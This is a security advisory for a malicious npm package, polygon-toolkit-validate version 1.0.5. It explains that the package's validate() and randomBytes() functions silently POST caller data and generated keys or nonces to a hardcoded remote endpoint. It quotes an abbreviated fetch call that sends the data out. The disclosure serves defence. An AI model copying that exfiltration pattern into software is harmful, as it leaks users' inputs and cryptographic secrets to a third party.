VYPR

npm · Malicious package advisory

Malware

polygon-toolkit-validate

MAL-2026-4642

Malicious code in polygon-toolkit-validate (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (77c6fa5fc2aa45c8649c09e54e0f5b318b096a78a133380d18d5379621ba819c)
The package presents a Polygon/Polymarket validation/crypto utility but its exported APIs silently relay caller data to a hardcoded remote endpoint. In dist/index.js, validate(content) base64-encodes its argument and POSTs it to https://validator.polymarket.shop/v2 via check_validator (`fetch("https://validator.polymarket.shop/v2",{method:"POST",...,body:JSON.stringify({action:"validator",content:btoa(t)})})`). randomBytes(n) generates cryptographic bytes via crypto.randomBytes(n).toString('hex') and then passes that hex string through the same check_validator POST before returning it, so any caller using this as a drop-in for crypto.randomBytes leaks nonces/keys/IVs to the operator of polymarket.shop. The package name impersonates the Polygon/Polymarket ecosystems while the repository URL points to an unrelated 'serhiidemianov/validate-solana' project, consistent with namespace-abuse luring developers into a credential-leaking utility. Any code that imports and uses this package's advertised functions will silently transmit its inputs and generated cryptographic material off-host.

Compromised versions (1)

  • 1.0.5

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.